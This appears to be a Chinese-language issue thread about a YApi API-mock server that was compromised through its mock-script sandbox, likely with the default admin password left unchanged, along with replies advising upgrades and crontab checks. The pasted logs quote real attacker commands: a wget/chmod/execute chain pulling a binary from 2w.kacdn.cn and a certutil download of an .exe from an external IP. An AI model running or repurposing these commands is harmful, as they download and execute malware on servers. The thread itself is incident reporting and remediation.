可能存在漏洞

[Thetiso]

参考了知乎的链接，安装的yapi。 贴一下链接： https://zhuanlan.zhihu.com/p/276312100 之前遇到过服务器对外流量暴增的问题，不知道是不是yapi的锅。 今早发现服务自己死了，看了下日志。

两个问题，

• 向外访问了一个荷兰IP：139.162.106.252
• 链接了2w.kacdn.cn 0day漏洞

`

docker logs -f yapi

Error: write EPIPE at WriteWrap.onWriteComplete [as oncomplete] (internal/stream_base_commons.js:83:16) Connecting to 2w.kacdn.cn (27.50.49.62:80) wget: error getting response: Connection reset by peer chmod: 20000: No such file or directory /bin/sh: ./20000: not found error: child_process.js:660 throw err; ^ Error: Command failed: id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000 Connecting to 2w.kacdn.cn (27.50.49.62:80) wget: error getting response: Connection reset by peer chmod: 20000: No such file or directory /bin/sh: ./20000: not found at checkExecSyncError (child_process.js:621:11) at Object.execSync (child_process.js:657:15) at evalmachine.:6:56 at Script.runInContext (vm.js:137:20) at Object.exports.sandbox (/api/vendors/server/utils/commons.js:288:10) at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26) at Object. (/api/vendors/exts/yapi-plugin-advanced-mock/server.js:210:18) at processTicksAndRejections (internal/process/task_queues.js:85:5) at async Promise.all (index 0) at async module.exports (/api/vendors/server/middleware/mockServer.js:334:7) { status: 127, signal: null, output: [ null, <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> ], pid: 17, stdout: <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> } Connecting to 117.24.13.169:664 (117.24.13.169:664) x86_64 100% |****| 33832 0:00:00 ETA (node:1) DeprecationWarning: collection.remove is deprecated. Use deleteOne, deleteMany, or bulkWrite instead. Error: write EPIPE at WriteWrap.onWriteComplete [as oncomplete] (internal/stream_base_commons.js:83:16) [json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve() Connecting to 27.50.49.61:1231 (27.50.49.61:1231) X64 100% |****| 33832 0:00:00 ETA Connecting to 2w.kacdn.cn (27.50.49.62:80) wget: error getting response: Connection reset by peer chmod: 20000: No such file or directory /bin/sh: ./20000: not found error: child_process.js:660 throw err; ^ Error: Command failed: id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000 Connecting to 2w.kacdn.cn (27.50.49.62:80) wget: error getting response: Connection reset by peer chmod: 20000: No such file or directory /bin/sh: ./20000: not found at checkExecSyncError (child_process.js:621:11) at Object.execSync (child_process.js:657:15) at evalmachine.:6:56 at Script.runInContext (vm.js:137:20) at Object.exports.sandbox (/api/vendors/server/utils/commons.js:288:10) at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26) at Object. (/api/vendors/exts/yapi-plugin-advanced-mock/server.js:210:18) at processTicksAndRejections (internal/process/task_queues.js:85:5) at async Promise.all (index 0) at async module.exports (/api/vendors/server/middleware/mockServer.js:334:7) { status: 127, signal: null, output: [ null, <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> ], pid: 42, stdout: <Buffer 75 69 64 3d 30 28 72 6f 6f 74 29 20 67 69 64 3d 30 28 72 6f 6f 74 29 20 67 72 6f 75 70 73 3d 30 28 72 6f 6f 74 29 2c 31 28 62 69 6e 29 2c 32 28 64 61 ... 80 more bytes>, stderr: <Buffer 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 32 77 2e 6b 61 63 64 6e 2e 63 6e 20 28 32 37 2e 35 30 2e 34 39 2e 36 32 3a 38 30 29 0a 77 67 65 74 3a 20 65 ... 116 more bytes> } (node:1) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'name' of null at /api/vendors/server/controllers/interface.js:285:51 (node:1) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1) (node:1) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code. [json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve() [json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve() [json-schema-faker] calling JsonSchemaFaker() is deprecated, call either .generate() or .resolve() log: -------------------------------------swaggerSyncUtils constructor----------------------------------------------- log: 服务已启动，请打开下面链接访问: http://127.0.0.1:3000/ log: mongodb load success... (node:1) [DEP0066] DeprecationWarning: OutgoingMessage.prototype._headers is deprecated (node:1) DeprecationWarning: collection.update is deprecated. Use updateOne, updateMany, or bulkWrite instead. (node:1) UnhandledPromiseRejectionWarning: TypeError: Cannot read property 'name' of null at /api/vendors/server/controllers/interface.js:285:51 (node:1) UnhandledPromiseRejectionWarning: Unhandled promise rejection. This error originated either by throwing inside of an async function without a catch block, or by rejecting a promise which was not handled with .catch(). (rejection id: 1) (node:1) [DEP0018] DeprecationWarning: Unhandled promise rejections are deprecated. In the future, promise rejections that are not handled will terminate the Node.js process with a non-zero exit code. error: evalmachine.:6 mockjson = process.mainModule.require("child_process").execSync("certutil -urlcache -split -f http://139.162.106.252/nlbn.exe d: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SyntaxError: Invalid or unexpected token at new Script (vm.js:86:7) at Object.exports.sandbox (/api/vendors/server/utils/commons.js:286:12) at Object.exports.handleMockScript (/api/vendors/server/utils/commons.js:632:26) at module.exports (/api/vendors/server/middleware/mockServer.js:331:22) at processTicksAndRejections (internal/process/task_queues.js:85:5) 2021/07/09 12:58:48 exit status 1 from execoutput running!!!child_process.js:660 throw err; ^ Error: spawnSync /bin/sh ENOBUFS at Object.spawnSync (internal/child_process.js:1041:20) at spawnSync (child_process.js:607:24) at Object.execSync (child_process.js:652:15) at WriteStream. (evalmachine.:27:49) at WriteStream.emit (events.js:208:15) at finishMaybe (_stream_writable.js:644:14) at _stream_writable.js:622:5 at WriteStream._final (internal/fs/streams.js:280:3) at callFinal (_stream_writable.js:615:10) at processTicksAndRejections (internal/process/task_queues.js:77:11) { errno: 'ENOBUFS', code: 'ENOBUFS', syscall: 'spawnSync /bin/sh', path: '/bin/sh', spawnargs: [ '-c', '.git/kworkers' ], error: [Circular], status: 0, signal: null, output: [ null, <Buffer 2f 61 70 69 2f 76 65 6e 64 6f 72 73 2f 2e 67 69 74 0a 77 6f 72 6b 69 6e 67 20 64 69 72 20 2f 61 70 69 2f 76 65 6e 64 6f 72 73 20 66 72 6f 6d 20 70 69 ... 1048480 more bytes>, <Buffer 32 30 32 31 2f 30 37 2f 30 39 20 31 32 3a 35 38 3a 34 38 20 65 78 69 74 20 73 74 61 74 75 73 20 31 20 66 72 6f 6d 20 65 78 65 63 6f 75 74 70 75 74 0a ... 10 more bytes> ], pid: 26, stdout: <Buffer 2f 61 70 69 2f 76 65 6e 64 6f 72 73 2f 2e 67 69 74 0a 77 6f 72 6b 69 6e 67 20 64 69 72 20 2f 61 70 69 2f 76 65 6e 64 6f 72 73 20 66 72 6f 6d 20 70 69 ... 1048480 more bytes>, stderr: <Buffer 32 30 32 31 2f 30 37 2f 30 39 20 31 32 3a 35 38 3a 34 38 20 65 78 69 74 20 73 74 61 74 75 73 20 31 20 66 72 6f 6d 20 65 78 65 63 6f 75 74 70 75 74 0a ... 10 more bytes> }

`

回chrome设置看了下，admin的默认密码忘记更换，估计这得分很大的锅

[jessezhang001]

安装最新就行了。 推荐使用 YApi Pro 这个版本（ https://github.com/yapi-pro/yapi ），解决了安装错误的问题，以及提供了 docker 方式部署

[xufengnian]

很显然，你中招了，execSync就是执行的恶意命令，如果你服务端是台windows就直接被拿下了，如果是Linux也尽快检查有无异常crontab

[jessezhang001]

用 YApi Pro（ https://github.com/yapi-pro/yapi ）提供的 yapi-pro-cli，升级到最新版即可。

npm install -g yapi-pro-cli --registry https://registry.npm.taobao.org
yapi update 

[itwhat126]

同样遇到这类问题，我之前装的是docker版本，后来重装的，又发现被注册了未知来源用户